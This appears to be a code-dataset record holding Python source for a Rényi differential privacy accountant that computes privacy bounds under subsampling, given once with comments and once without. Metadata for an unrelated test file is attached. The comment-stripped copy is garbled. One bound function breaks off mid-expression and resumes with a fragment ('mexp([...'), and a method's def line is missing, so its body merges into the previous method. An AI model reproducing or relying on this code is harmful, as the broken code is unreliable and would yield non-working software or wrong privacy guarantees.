m_lin_max.') return cur results = minimize_scalar(fun, method='Bounded', bounds=[self.m-1, bestint + 2], options={'disp': False}) if results.success: return results.fun else: return None #return fun(bestint) if bestint == 0: if self.verbose: print('Warning: Smallest alpha = 1.') # find the best integer alpha. bestalpha = self.alphas[bestint] results = minimize_scalar(fun, method='Bounded',bounds=[bestalpha-1, bestalpha+1], options={'disp':False}) # the while loop above ensures that bestint+2 is at most m, and also bestint is at least 0. if results.success: return results.fun else: # There are cases when certain \delta is not feasible. # For example, let p and q be uniform the privacy R.V. is either 0 or \infty and unless all \infty # events are taken cared of by \delta, \epsilon cannot be < \infty return -1 def compose_mechanism(self, func, coeff=1.0): self.flag = False if func in self.idxhash: self.coeffs[self.idxhash[func]] += coeff # also update the integer CGFs self.RDPs_int += self.cache[func] * coeff else: # book keeping self.idxhash[func] = self.n self.n += 1 self.coeffs.append(coeff) # update the analytical self.RDPs.append(func) # also update the integer results if func in self.cache: tmp = self.cache[func] else: tmp = np.zeros_like(self.RDPs_int, float) for i in range(self.m): tmp[i] = func(i+1) self.cache[func] = tmp # save in cache self.RDPs_int += tmp * coeff self.RDP_inf += func(np.inf) * coeff #795010 #imple 100 def compose_subsampled_mechanism(self, func, prob, coeff=1.0): # This function is for subsample without replacements. self.flag = False self.flag_subsample = True if (func, prob) in self.idxhash: idx = self.idxhash[(func, prob)] # update the coefficients of each function self.coeffs[idx] += coeff # also update the integer CGFs self.RDPs_int += self.cache[(func, prob)] * coeff else: def cgf(x): return x * func(x+1) # we need forward differences of thpe exp(cgf) # The following line is the numericall y stable way of implementing it. # The output is in polar form with logarithmic magnitude deltas, signs_deltas = utils.get_forward_diffs(cgf,self.m) #deltas1, signs_deltas1 = get_forward_diffs_direct(func, self.m) #tmp = deltas-deltas1 self.deltas_cache[(func,prob)] = [deltas,signs_deltas] def subsample_func_int(x): # This function evaluates teh CGF at alpha = x, i.e., lamb = x- 1 deltas_local, signs_deltas_local = self.deltas_cache[(func,prob)] if np.isinf(func(x)): return np.inf mm = int(x) fastupperbound = fast_subsampled_cgf_upperbound(func, mm, prob, deltas_local) fastupperbound2 = general_upperbound(func, mm, prob) if self.approx ==True: if fastupperbound2 <0: print('general rdp is negative',x) return fastupperbound2 if mm <= self.alphas[-1]: # compute the bound exactly. Requires book keeping of O(x^2) moments = [ np.minimum(np.minimum((j)*np.log(np.exp(func(np.inf))-1) + np.minimum(cgf(j-1),np.log(4)), np.log(2) + cgf(j-1)), np.log(4) + 0.5*deltas_local[int(2*np.floor(j/2.0))-1] + 0.5*deltas_local[int(2*np.ceil(j/2.0))-1]) + j*np.log(prob) +self.logBinomC[int(mm), j] for j in range(2,int(mm+1),1)] return np.minimum(fastupperbound, utils.stable_logsumexp([0]+moments)) elif mm <= self.m_lin_max: # compute the bound with stirling approximation. Everything is O(x) now. moment_bound = lambda j: np.minimum(j * np.log(np.exp(func(np.inf)) - 1) + np.minimum(cgf(j - 1), np.log(4)), np.log(2) + cgf(j - 1)) + j * np.log(prob) + utils.logcomb(mm, j) moments = [moment_bound(j) for j in range(2,mm+1,1)] return np.minimum(fastupperbound, utils.stable_logsumexp([0]+ moments)) else: # Compute the O(1) upper bound return fastupperbound def subsample_func(x): # This function returns the RDP at alpha = x # RDP with the linear interpolation upper bound of the CGF epsinf, tmp = subsample_epsdelta(func(np.inf),0,prob) if np.isinf(x): return epsinf if prob == 1.0: return func(x) if (x >= 1.0) and (x <= 2.0): return np.minimum(epsinf, subsample_func_int(2.0) / (2.0-1)) if np.equal(np.mod(x, 1), 0): return np.minimum(epsinf, subsample_func_int(x) / (x-1) ) xc = math.ceil(x) xf = math.floor(x) return np.minimum( epsinf, ((x-xf)*subsample_func_int(xc) + (1-(x-xf))*subsample_func_int(xf)) / (x-1) ) # book keeping self.idxhash[(func, prob)] = self.n # save the index self.n += 1 # increment the number of unique mechanisms self.coeffs.append(coeff) # Update the coefficient self.RDPs.append(subsample_func) # update the analytical functions # also update the integer results up to m_max. if (func,prob) in self.cache: results = self.cache[(func,prob)] else: results = np.zeros_like(self.RDPs_int, float) # m = np.max(self.lambs) mm = np.max(self.alphas) for alpha in range(2, mm+1): results[alpha-1] = subsample_func(alpha) results[0] = results[1] # Provide the trivial upper bound of RDP at alpha = 1 --- the KL privacy. self.cache[(func,prob)] = results # save in cache self.RDPs_int += results * coeff # update the pure DP eps, delta = subsample_epsdelta(func(np.inf), 0, prob) self.RDP_inf += eps * coeff # mm = np.max(self.alphas) # # jvec = np.arange(2, mm+1) # # logterm3plus = np.zeros_like(results) # for j in jvec: # logterm3plus[j-2] = (np.minimum(np.minimum(j * np.log(np.exp(func(np.inf)) - 1) # + np.minimum(np.log(4),cgf(j-1)), np.log(2) + cgf(j-1)), # np.log(4) + 0.5 * deltas[int(2 * np.floor(j / 2.0))-1] # + 0.5 * deltas[int(2 * np.ceil(j / 2.0))-1]) # + j * np.log(prob)) # # for alpha in range(2, mm+1): # if np.isinf(logterm3plus[alpha-1]): # results[alpha-1] = np.inf # else: # tmp = utils.stable_logsumexp(logterm3plus[0:alpha-1] + self.logBinomC[alpha, 2:(alpha+1)]) # results[alpha-1] = utils.stable_logsumexp_two(0, tmp) / (1.0*alpha-1) # # results[0] = results[1] # Provide the trivial upper bound of RDP at alpha = 1 --- the KL privacy. # # self.cache[(func,prob)] = results # save in cache # self.RDPs_int += results # # # For debugging: The following 'results1' should be the same as 'results' above. # # results1 = np.zeros_like(self.RDPs_int, float) # # for j in range(self.m): # # results1[j] = subsample_func(j+1) # # eps, delta = subsample_epsdelta(func(np.inf), 0, prob) # self.RDP_inf += eps def compose_poisson_subsampled_mechanisms(self, func, prob, coeff=1.0): # This function implements the lower bound for subsampled RDP. # It is also the exact formula of poission_subsampled RDP for many mechanisms including Gaussian mech. # # At the moment, we do not support mixing poisson subsampling and standard subsampling. # TODO: modify the caching identifies so that we can distinguish different types of subsampling # self.flag = False self.flag_subsample = True if (func, prob) in self.idxhash: idx = self.idxhash[(func, prob)] # TODO: this is really where it needs to be changed. # update the coefficients of each function self.coeffs[idx] += coeff # also update the integer CGFs self.RDPs_int += self.cache[(func, prob)] * coeff else: # compute an easy to compute upper bound of it. def cgf(x): return x * func(x+1) def subsample_func_int(x): # This function evaluates teh CGF at alpha = x, i.e., lamb = x- 1 if np.isinf(func(x)): return np.inf mm = int(x) # fastbound = fast_poission_subsampled_cgf_upperbound(func, mm, prob) k = self.alphas[-1] fastbound_k = fast_k_subsample_upperbound(func, mm, prob,k) if self.approx == True: return fastbound_k #fastbound = min(fastbound, fastbound_k) if x <= self.alphas[-1]: # compute the bound exactly. moments = [cgf(j-1) +j*np.log(prob) + (mm-j) * np.log(1-prob) + self.logBinomC[mm, j] for j in range(2,mm+1,1)] return utils.stable_logsumexp([(mm-1)*np.log(1-prob)+np.log(1+(mm-1)*prob)]+moments) elif mm <= self.m_lin_max: moments = [cgf(j-1) +j*np.log(prob) + (mm-j) * np.log(1-prob) + utils.logcomb(mm,j) for j in range(2,mm+1,1)] return utils.stable_logsumexp([(mm-1)*np.log(1-prob)+np.log(1+(mm-1)*prob)] + moments) else: return fastbound def subsample_func(x): # linear interpolation upper bound # This function implements the RDP at alpha = x if np.isinf(func(x)): return np.inf if prob == 1.0: return func(x) epsinf, tmp = subsample_epsdelta(func(np.inf),0,prob) if np.isinf(x): return epsinf if (x >= 1.0) and (x <= 2.0): return np.minimum(epsinf, subsample_func_int(2.0) / (2.0-1)) if np.equal(np.mod(x, 1), 0): return np.minimum(epsinf, subsample_func_int(x) / (x-1) ) xc = math.ceil(x) xf = math.floor(x) return np.minimum( epsinf, ((x-xf)*subsample_func_int(xc) + (1-(x-xf))*subsample_func_int(xf)) / (x-1) ) # book keeping self.idxhash[(func, prob)] = self.n # save the index self.n += 1 # increment the number of unique mechanisms self.coeffs.append(coeff) # Update the coefficient self.RDPs.append(subsample_func) # update the analytical functions # also update the integer results, with a vectorized computation. # TODO: pre-computing subsampled RDP for integers is error-prone (implement the same thing twice) # TODO: and its benefits are not clear. We should consider removing it and simply call the lambda function. # if (func,prob) in self.cache: results = self.cache[(func,prob)] else: results = np.zeros_like(self.RDPs_int, float) mm = np.max(self.alphas) # evaluate the RDP up to order mm jvec = np.arange(2, mm + 1) logterm3plus = np.zeros_like(results) # This saves everything from j=2 to j = m+1 for j in jvec: logterm3plus[j-2] = cgf(j-1) + j * np.log(prob) #- np.log(1-prob)) for alpha in range(2, mm+1): if np.isinf(logterm3plus[alpha-1]): results[alpha-1] = np.inf else: tmp = utils.stable_logsumexp(logterm3plus[0:alpha-1] + self.logBinomC[alpha , 2:(alpha + 1)] + (alpha+1-jvec[0:alpha-1])*np.log(1-prob)) results[alpha-1] = utils.stable_logsumexp_two((alpha-1)*np.log(1-prob) + np.log(1+(alpha-1)*prob), tmp) / (1.0*alpha-1) results[0] = results[1] # Provide the trivial upper bound of RDP at alpha = 1 --- the KL privacy. self.cache[(func,prob)] = results # save in cache self.RDPs_int += results * coeff # update the pure DP tracker eps, delta = subsample_epsdelta(func(np.inf), 0, prob) self.RDP_inf += eps * coeff def compose_poisson_subsampled_mechanisms1(self, func, prob, coeff=1.0): # This function implements the general amplification bounds for Poisson sampling. # No additional assumptions are needed. # At the moment, we do not support mixing poisson subsampling and standard subsampling. # self.flag = False self.flag_subsample = True if (func, prob) in self.idxhash: idx = self.idxhash[(func, prob)] # update the coefficients of each function self.coeffs[idx] += coeff # also update the integer CGFs self.RDPs_int += self.cache[(func, prob)] * coeff else: # compute an easy to compute upper bound of it. cgf = lambda x: x*func(x+1) def subsample_func_int(x): # This function evaluates the CGF at alpha = x, i.e., lamb = x- 1 if np.isinf(func(x)): return np.inf if prob == 1.0: return func(x) mm = int(x) fastbound = fast_poission_subsampled_cgf_upperbound(func, mm, prob) if x <= self.alphas[-1]: # compute the bound exactly. moments = [cgf(1) + 2*np.log(prob) + (mm-2) * np.log(1 - prob) + self.logBinomC[mm, 2]] moments = moments + [cgf(j-1+1) +j*np.log(prob) + (mm-j) * np.log(1 - prob) + self.logBinomC[mm, j] for j in range(3,mm+1,1)] return utils.stable_logsumexp([(mm-1)*np.log(1-prob)+np.log(1+(mm-1)*prob)]+moments) elif mm <= self.m_lin_max: moments = [cgf(1) + 2*np.log(prob) + (mm-2) * np.log(1 - prob) + utils.logcomb(mm, 2)] moments = moments + [cgf(j-1+1) +j*np.log(prob) + (mm-j) * np.log(1 - prob) + utils.logcomb(mm, j) for j in range(3,mm+1,1)] return utils.stable_logsumexp([(mm-1)*np.log(1-prob)+np.log(1+(mm-1)*prob)]+moments) else: return fastbound def subsample_func(x): # linear interpolation upper bound epsinf, tmp = subsample_epsdelta(func(np.inf),0,prob) if np.isinf(x): return epsinf if (x >= 1.0) and (x <= 2.0): return np.minimum(epsinf, subsample_func_int(2.0) / (2.0-1)) if np.equal(np.mod(x, 1), 0): return np.minimum(epsinf, subsample_func_int(x) / (x-1) ) xc = math.ceil(x) xf = math.floor(x) return np.minimum( epsinf, ((x-xf)*subsample_func_int(xc) + (1-(x-xf))*subsample_func_int(xf)) / (x-1) ) # book keeping self.idxhash[(func, prob)] = self.n # save the index self.n += 1 # increment the number of unique mechanisms self.coeffs.append(coeff) # Update the coefficient self.RDPs.append(subsample_func) # update the analytical functions # also update the integer results if (func,prob) in self.cache: results = self.cache[(func,prob)] else: results = np.zeros_like(self.RDPs_int, float) mm = np.max(self.alphas) # evaluate the RDP up to order mm for alpha in range(2, mm+1): results[alpha-1] = subsample_func_int(alpha) results[0] = results[1] # Provide the trivial upper bound of RDP at alpha = 1 --- the KL privacy. self.cache[(func,prob)] = results # save in cache self.RDPs_int += results * coeff # update the pure DP tracker eps, delta = subsample_epsdelta(func(np.inf), 0, prob) self.RDP_inf += eps * coeff # TODO: 1. Modularize the several Poission sampling versions. 2. Support both sampling schemes together.
44.658473
125
0.534312
import numpy as np from scipy.optimize import minimize_scalar import sys sys.path.append('..') import autodp from autodp import utils, rdp_bank from autodp.privacy_calibrator import subsample_epsdelta import scipy import math def general_upperbound(func, mm, prob): def cgf(x): return (x - 1) * func(x) if np.isinf(func(mm)): return np.inf if mm == 1 or mm == 0: return 0 cur_k = np.minimum(50, mm - 1) log_term_1 = mm * np.log(1 - prob) log_term_2 = np.log(3) - func(mm) + mm * utils.stable_logsumexp_two(np.log(1 - prob), np.log(prob) + func(mm)) neg_term_3 = [np.log(scipy.special.comb(mm,l)) + np.log(3) + (mm - l) * np.log(1 - prob) + l * np.log(prob) + utils.stable_log_diff_exp((l - 1) * func(mm), cgf(l))[1] for l in range(3, cur_k + 1)] neg_term_4 = np.log(mm*(mm - 1)/2) + 2 * np.log(prob) + (mm - 2) * np.log( 1 - prob) + utils.stable_log_diff_exp(np.log(3) + func(mm), func(2))[1] neg_term_5 = np.log(2) + np.log(prob) + np.log(mm) + (mm - 1) * np.log(1 - prob) neg_term_6 = mm * np.log(1 - prob) + np.log(3) - func(mm) pos_term = utils.stable_logsumexp([log_term_1, log_term_2]) neg_term_3.append(neg_term_4) neg_term_3.append(neg_term_5) neg_term_3.append(neg_term_6) neg_term = utils.stable_logsumexp(neg_term_3) bound = utils.stable_log_diff_exp(pos_term, neg_term)[1] return bound def fast_subsampled_cgf_upperbound(func, mm, prob, deltas_local): return np.inf if np.isinf(func(mm)): return np.inf if mm == 1: return 0 secondterm = np.minimum(np.minimum((2) * np.log(np.exp(func(np.inf)) - 1) + np.minimum(func(2), np.log(4)), np.log(2) + func(2)), np.log(4) + 0.5 * deltas_local[int(2 * np.floor(2 / 2.0)) - 1] + 0.5 * deltas_local[int(2 * np.ceil(2 / 2.0)) - 1] ) + 2 * np.log(prob) + np.log(mm) + np.log(mm - 1) - np.log(2) if mm == 2: return utils.stable_logsumexp([0, secondterm]) logratio1 = np.log(prob) + np.log(mm) + func(mm) logratio2 = logratio1 + np.log(np.exp(func(np.inf)) - 1) logratio = np.minimum(logratio1, logratio2) if logratio1 > logratio2: coeff = 1 else: coeff = 2 if mm == 3: return utils.stable_logsumexp([0, secondterm, np.log(coeff) + 3 * logratio]) if logratio < 0: geometric_series_bound = np.log(coeff) + 3 * logratio - np.log(1 - np.exp(logratio)) \ + np.log(1 - np.exp((mm - 2) * logratio)) elif logratio > 0: geometric_series_bound = np.log(coeff) + 3 * logratio + (mm-2) * logratio - np.log(np.exp(logratio) - 1) else: geometric_series_bound = np.log(coeff) + np.log(mm - 2) logh1 = np.log(prob) + func(mm - 1) logh2 = logh1 + np.log(np.exp(func(np.inf)) - 1) binomial_series_bound1 = np.log(2) + mm * utils.stable_logsumexp_two(0, logh1) binomial_series_bound2 = mm * utils.stable_logsumexp_two(0, logh2) tmpsign, binomial_series_bound1 \ = utils.stable_sum_signed(True, binomial_series_bound1, False, np.log(2) + utils.stable_logsumexp([0, logh1 + np.log(mm), 2 * logh1 + np.log(mm) + np.log(mm - 1) - np.log(2)])) tmpsign, binomial_series_bound2 \ = utils.stable_sum_signed(True, binomial_series_bound2, False, utils.stable_logsumexp([0, logh2 + np.log(mm), 2 * logh2 + np.log(mm) + np.log(mm - 1) - np.log(2)])) remainder = np.min([geometric_series_bound, binomial_series_bound1, binomial_series_bound2]) return utils.stable_logsumexp([0, secondterm, remainder]) def fast_poission_subsampled_cgf_upperbound(func, mm, prob): if np.isinf(func(mm)): return np.inf if mm == 1: return 0 .log(1-prob), np.log(prob) + func(mm)) mexp([mm * np.log(1-prob), (mm-1) * np.log(1-prob) + np.log(mm) + np.log(prob), (mm-2)*np.log(1-prob) + 2 * np.log(prob) + np.log(mm) + np.log(mm-1) + func(2), np.log(mm) + np.log(mm-1) + np.log(mm-2) - np.log(3*2) + 3 * np.log(prob) + (mm-3)*np.log(1-prob) + 2 * func(mm) + (mm-3) * utils.stable_logsumexp_two(0, np.log(prob) - np.log(1-prob) + func(mm))]) else: bound2 = bound1 return np.minimum(bound1,bound2) def fast_k_subsample_upperbound(func, mm, prob, k): def cgf(x): return (x - 1) * func(x) if np.isinf(func(mm)): return np.inf if mm == 1: return 0 cur_k = np.minimum(k, mm - 1) if (2 * cur_k) >= mm: exact_term_1 = (mm - 1) * np.log(1 - prob) + np.log(mm * prob - prob + 1) exact_term_2 = [np.log(scipy.special.comb(mm,l)) + (mm - l) * np.log(1 - prob) + l * np.log(prob) + cgf(l) for l in range(2, mm + 1)] exact_term_2.append(exact_term_1) bound = utils.stable_logsumexp(exact_term_2) return bound s, mag1 = utils.stable_log_diff_exp(0, -func(mm - cur_k)) new_log_term_1 = np.log(1 - prob) * mm + mag1 new_log_term_2 = -func(mm - cur_k) + mm * utils.stable_logsumexp_two(np.log(1 - prob), np.log(prob) + func(mm - cur_k)) new_log_term_3 = [np.log(scipy.special.comb(mm,l)) + (mm - l) * np.log(1 - prob) + l * np.log(prob) + utils.stable_log_diff_exp((l - 1) * func(mm - cur_k), cgf(l))[1] for l in range(2, cur_k + 1)] if len(new_log_term_3) > 0: new_log_term_3 = utils.stable_logsumexp(new_log_term_3) else: return utils.stable_logsumexp_two(new_log_term_1, new_log_term_2) new_log_term_4 = [np.log(scipy.special.comb(mm,mm-l)) + (mm - l) * np.log(1 - prob) + l * np.log(prob) + utils.stable_log_diff_exp(cgf(l), (l - 1) * func(mm - cur_k))[1] for l in range(mm - cur_k + 1, mm + 1)] new_log_term_4.append(new_log_term_1) new_log_term_4.append(new_log_term_2) new_log_term_4 = utils.stable_logsumexp(new_log_term_4) s, new_log_term_5 = utils.stable_log_diff_exp(new_log_term_4, new_log_term_3) new_bound = new_log_term_5 return new_bound class anaRDPacct: def __init__(self, m=100, tol=0.1, m_max=500, m_lin_max=10000, approx = False, verbose=False): self.m = m self.m_max = m_max self.m_lin_max = m_lin_max self.verbose = verbose self.approx = approx self.lambs = np.linspace(1, self.m, self.m).astype(int) self.alphas = np.linspace(1, self.m, self.m).astype(int) self.RDPs_int = np.zeros_like(self.alphas, float) self.n=0 self.RDPs = [] self.coeffs = [] self.RDP_inf = .0 self.logBinomC = utils.get_binom_coeffs(self.m + 1) self.idxhash = {} self.cache = {} self.deltas_cache = {} self.evalRDP = lambda x: 0 self.flag = True self.flag_subsample = False self.tol = tol def build_zeroth_oracle(self): self.evalRDP = lambda x: sum([c * item(x) for (c, item) in zip(self.coeffs, self.RDPs)]) def plot_rdp(self): if not self.flag: self.build_zeroth_oracle() self.flag = True import matplotlib.pyplot as plt plt.figure(num=None, figsize=(12, 8), dpi=80, facecolor='w', edgecolor='k') x = range(0,self.m,1) y = [self.evalRDP(item) for item in x] plt.loglog(x, y) plt.show() def plot_cgf_int(self): import matplotlib.pyplot as plt plt.figure(num=None, figsize=(12, 8), dpi=80, facecolor='w', edgecolor='k') plt.plot(self.alphas, self.RDPs_int) plt.xlabel(r'$\lambda$') plt.ylabel('CGF') plt.show() def plot_rdp_int(self): import matplotlib.pyplot as plt plt.figure(num=None, figsize=(12, 8), dpi=80, facecolor='w', edgecolor='k') plt.loglog(self.alphas, self.RDPs_int) if not self.flag: self.build_zeroth_oracle() self.flag = True x = range(1,self.m_lin_max,1) y = [self.evalRDP(item) for item in x] plt.loglog(x, y) plt.xlabel(r'$\alpha$') plt.ylabel(r'RDP $\epsilon$') plt.show() def get_rdp(self,alphas): if not self.flag: self.build_zeroth_oracle() self.flag = True alphas = np.array(alphas) assert(np.all(alphas >= 1)) rdp_list = [] for alpha in alphas: rdp_list.append(self.evalRDP(alpha)) return np.array(rdp_list) def get_eps(self, delta): if not self.flag: self.build_zeroth_oracle() self.flag = True if delta<0 or delta > 1: print("Error! delta is a probability and must be between 0 and 1") if delta == 0: return self.RDP_inf else: def fun(x): if x <= 1: return np.inf else: return np.log(1 / delta)/(x-1) + self.evalRDP(x) def fun_int(i): # the input is RDP's \alpha in integer if i <= 1 | i >= len(self.RDPs_int): return np.inf else: return np.log(1 / delta) / (i-1) + self.RDPs_int[i - 1] while (self.m<self.m_max) and (not np.isposinf(fun(self.m))) and (fun_int(self.m-1)-fun_int(self.m-2) < 0): if self.flag_subsample: self.logBinomC = utils.get_binom_coeffs(self.m*2+1) for key, val in self.deltas_cache.items(): if type(key) is tuple: func_tmp = key[0] else: func_tmp = key cgf = lambda x: x*func_tmp(x+1) deltas,signs_deltas = utils.get_forward_diffs(cgf,self.m*2) self.deltas_cache[key] = [deltas, signs_deltas] new_alphas = range(self.m + 1, self.m * 2 + 1, 1) self.alphas = np.concatenate((self.alphas, np.array(new_alphas))) self.m = self.m * 2 mm = np.max(self.alphas) rdp_int_new = np.zeros_like(self.alphas, float) for key,val in self.cache.items(): idx = self.idxhash[key] rdp = self.RDPs[idx] newarray = np.zeros_like(self.alphas, float) for j in range(2,mm+1,1): newarray[j-1] = rdp(1.0*j) newarray[0]=newarray[1] coeff = self.coeffs[idx] rdp_int_new += newarray * coeff self.cache[key] = newarray self.RDPs_int = rdp_int_new bestint = np.argmin(np.log(1 / delta)/(self.alphas[1:]-1) + self.RDPs_int[1:]) + 1 if bestint == self.m-1: if self.verbose: print('Warning: Reach quadratic upper bound: m_max.') cur = fun(bestint) while (not np.isposinf(cur)) and fun(bestint-1)-fun(bestint-2) < -1e-8: bestint = bestint*2 cur = fun(bestint) if bestint > self.m_lin_max and self.approx ==True: print('Warning: Reach linear upper bound: m_lin_max.') return cur results = minimize_scalar(fun, method='Bounded', bounds=[self.m-1, bestint + 2], options={'disp': False}) if results.success: return results.fun else: return None if bestint == 0: if self.verbose: print('Warning: Smallest alpha = 1.') bestalpha = self.alphas[bestint] results = minimize_scalar(fun, method='Bounded',bounds=[bestalpha-1, bestalpha+1], options={'disp':False}) if results.success: return results.fun else: return -1 def compose_mechanism(self, func, coeff=1.0): self.flag = False if func in self.idxhash: self.coeffs[self.idxhash[func]] += coeff self.RDPs_int += self.cache[func] * coeff else: self.idxhash[func] = self.n self.n += 1 self.coeffs.append(coeff) self.RDPs.append(func) if func in self.cache: tmp = self.cache[func] else: tmp = np.zeros_like(self.RDPs_int, float) for i in range(self.m): tmp[i] = func(i+1) self.cache[func] = tmp self.RDPs_int += tmp * coeff self.RDP_inf += func(np.inf) * coeff def compose_subsampled_mechanism(self, func, prob, coeff=1.0): self.flag = False self.flag_subsample = True if (func, prob) in self.idxhash: idx = self.idxhash[(func, prob)] self.coeffs[idx] += coeff self.RDPs_int += self.cache[(func, prob)] * coeff else: def cgf(x): return x * func(x+1) deltas, signs_deltas = utils.get_forward_diffs(cgf,self.m) self.deltas_cache[(func,prob)] = [deltas,signs_deltas] def subsample_func_int(x): deltas_local, signs_deltas_local = self.deltas_cache[(func,prob)] if np.isinf(func(x)): return np.inf mm = int(x) fastupperbound = fast_subsampled_cgf_upperbound(func, mm, prob, deltas_local) fastupperbound2 = general_upperbound(func, mm, prob) if self.approx ==True: if fastupperbound2 <0: print('general rdp is negative',x) return fastupperbound2 if mm <= self.alphas[-1]: moments = [ np.minimum(np.minimum((j)*np.log(np.exp(func(np.inf))-1) + np.minimum(cgf(j-1),np.log(4)), np.log(2) + cgf(j-1)), np.log(4) + 0.5*deltas_local[int(2*np.floor(j/2.0))-1] + 0.5*deltas_local[int(2*np.ceil(j/2.0))-1]) + j*np.log(prob) +self.logBinomC[int(mm), j] for j in range(2,int(mm+1),1)] return np.minimum(fastupperbound, utils.stable_logsumexp([0]+moments)) elif mm <= self.m_lin_max: moment_bound = lambda j: np.minimum(j * np.log(np.exp(func(np.inf)) - 1) + np.minimum(cgf(j - 1), np.log(4)), np.log(2) + cgf(j - 1)) + j * np.log(prob) + utils.logcomb(mm, j) moments = [moment_bound(j) for j in range(2,mm+1,1)] return np.minimum(fastupperbound, utils.stable_logsumexp([0]+ moments)) else: return fastupperbound def subsample_func(x): epsinf, tmp = subsample_epsdelta(func(np.inf),0,prob) if np.isinf(x): return epsinf if prob == 1.0: return func(x) if (x >= 1.0) and (x <= 2.0): return np.minimum(epsinf, subsample_func_int(2.0) / (2.0-1)) if np.equal(np.mod(x, 1), 0): return np.minimum(epsinf, subsample_func_int(x) / (x-1) ) xc = math.ceil(x) xf = math.floor(x) return np.minimum( epsinf, ((x-xf)*subsample_func_int(xc) + (1-(x-xf))*subsample_func_int(xf)) / (x-1) ) self.idxhash[(func, prob)] = self.n self.n += 1 self.coeffs.append(coeff) self.RDPs.append(subsample_func) if (func,prob) in self.cache: results = self.cache[(func,prob)] else: results = np.zeros_like(self.RDPs_int, float) mm = np.max(self.alphas) for alpha in range(2, mm+1): results[alpha-1] = subsample_func(alpha) results[0] = results[1] self.cache[(func,prob)] = results self.RDPs_int += results * coeff eps, delta = subsample_epsdelta(func(np.inf), 0, prob) self.RDP_inf += eps * coeff self.flag = False self.flag_subsample = True if (func, prob) in self.idxhash: idx = self.idxhash[(func, prob)] self.coeffs[idx] += coeff self.RDPs_int += self.cache[(func, prob)] * coeff else: def cgf(x): return x * func(x+1) def subsample_func_int(x): if np.isinf(func(x)): return np.inf mm = int(x) fastbound = fast_poission_subsampled_cgf_upperbound(func, mm, prob) k = self.alphas[-1] fastbound_k = fast_k_subsample_upperbound(func, mm, prob,k) if self.approx == True: return fastbound_k if x <= self.alphas[-1]: moments = [cgf(j-1) +j*np.log(prob) + (mm-j) * np.log(1-prob) + self.logBinomC[mm, j] for j in range(2,mm+1,1)] return utils.stable_logsumexp([(mm-1)*np.log(1-prob)+np.log(1+(mm-1)*prob)]+moments) elif mm <= self.m_lin_max: moments = [cgf(j-1) +j*np.log(prob) + (mm-j) * np.log(1-prob) + utils.logcomb(mm,j) for j in range(2,mm+1,1)] return utils.stable_logsumexp([(mm-1)*np.log(1-prob)+np.log(1+(mm-1)*prob)] + moments) else: return fastbound def subsample_func(x): if np.isinf(func(x)): return np.inf if prob == 1.0: return func(x) epsinf, tmp = subsample_epsdelta(func(np.inf),0,prob) if np.isinf(x): return epsinf if (x >= 1.0) and (x <= 2.0): return np.minimum(epsinf, subsample_func_int(2.0) / (2.0-1)) if np.equal(np.mod(x, 1), 0): return np.minimum(epsinf, subsample_func_int(x) / (x-1) ) xc = math.ceil(x) xf = math.floor(x) return np.minimum( epsinf, ((x-xf)*subsample_func_int(xc) + (1-(x-xf))*subsample_func_int(xf)) / (x-1) ) self.idxhash[(func, prob)] = self.n self.n += 1 self.coeffs.append(coeff) self.RDPs.append(subsample_func) if (func,prob) in self.cache: results = self.cache[(func,prob)] else: results = np.zeros_like(self.RDPs_int, float) mm = np.max(self.alphas) jvec = np.arange(2, mm + 1) logterm3plus = np.zeros_like(results) for j in jvec: logterm3plus[j-2] = cgf(j-1) + j * np.log(prob) for alpha in range(2, mm+1): if np.isinf(logterm3plus[alpha-1]): results[alpha-1] = np.inf else: tmp = utils.stable_logsumexp(logterm3plus[0:alpha-1] + self.logBinomC[alpha , 2:(alpha + 1)] + (alpha+1-jvec[0:alpha-1])*np.log(1-prob)) results[alpha-1] = utils.stable_logsumexp_two((alpha-1)*np.log(1-prob) + np.log(1+(alpha-1)*prob), tmp) / (1.0*alpha-1) results[0] = results[1] self.cache[(func,prob)] = results self.RDPs_int += results * coeff eps, delta = subsample_epsdelta(func(np.inf), 0, prob) self.RDP_inf += eps * coeff def compose_poisson_subsampled_mechanisms1(self, func, prob, coeff=1.0): self.flag = False self.flag_subsample = True if (func, prob) in self.idxhash: idx = self.idxhash[(func, prob)] self.coeffs[idx] += coeff self.RDPs_int += self.cache[(func, prob)] * coeff else: cgf = lambda x: x*func(x+1) def subsample_func_int(x): if np.isinf(func(x)): return np.inf if prob == 1.0: return func(x) mm = int(x) fastbound = fast_poission_subsampled_cgf_upperbound(func, mm, prob) if x <= self.alphas[-1]: moments = [cgf(1) + 2*np.log(prob) + (mm-2) * np.log(1 - prob) + self.logBinomC[mm, 2]] moments = moments + [cgf(j-1+1) +j*np.log(prob) + (mm-j) * np.log(1 - prob) + self.logBinomC[mm, j] for j in range(3,mm+1,1)] return utils.stable_logsumexp([(mm-1)*np.log(1-prob)+np.log(1+(mm-1)*prob)]+moments) elif mm <= self.m_lin_max: moments = [cgf(1) + 2*np.log(prob) + (mm-2) * np.log(1 - prob) + utils.logcomb(mm, 2)] moments = moments + [cgf(j-1+1) +j*np.log(prob) + (mm-j) * np.log(1 - prob) + utils.logcomb(mm, j) for j in range(3,mm+1,1)] return utils.stable_logsumexp([(mm-1)*np.log(1-prob)+np.log(1+(mm-1)*prob)]+moments) else: return fastbound def subsample_func(x): epsinf, tmp = subsample_epsdelta(func(np.inf),0,prob) if np.isinf(x): return epsinf if (x >= 1.0) and (x <= 2.0): return np.minimum(epsinf, subsample_func_int(2.0) / (2.0-1)) if np.equal(np.mod(x, 1), 0): return np.minimum(epsinf, subsample_func_int(x) / (x-1) ) xc = math.ceil(x) xf = math.floor(x) return np.minimum( epsinf, ((x-xf)*subsample_func_int(xc) + (1-(x-xf))*subsample_func_int(xf)) / (x-1) ) self.idxhash[(func, prob)] = self.n self.n += 1 self.coeffs.append(coeff) self.RDPs.append(subsample_func) if (func,prob) in self.cache: results = self.cache[(func,prob)] else: results = np.zeros_like(self.RDPs_int, float) mm = np.max(self.alphas) for alpha in range(2, mm+1): results[alpha-1] = subsample_func_int(alpha) results[0] = results[1] self.cache[(func,prob)] = results self.RDPs_int += results * coeff eps, delta = subsample_epsdelta(func(np.inf), 0, prob) self.RDP_inf += eps * coeff
true
true
f705c04fa8bb30cc2be892362cc4af89d3328301
1,297
py
Python
test/test_utils/test_statistical_tests.py
deslay1/CAVE
e4b9abc3812034f49dddd27ffc17dbab39782a1c
[ "BSD-3-Clause" ]
45
2018-01-11T11:26:11.000Z
2021-06-22T06:14:39.000Z
test/test_utils/test_statistical_tests.py
deslay1/CAVE
e4b9abc3812034f49dddd27ffc17dbab39782a1c
[ "BSD-3-Clause" ]
150
2017-12-20T16:14:45.000Z
2021-09-28T11:26:33.000Z
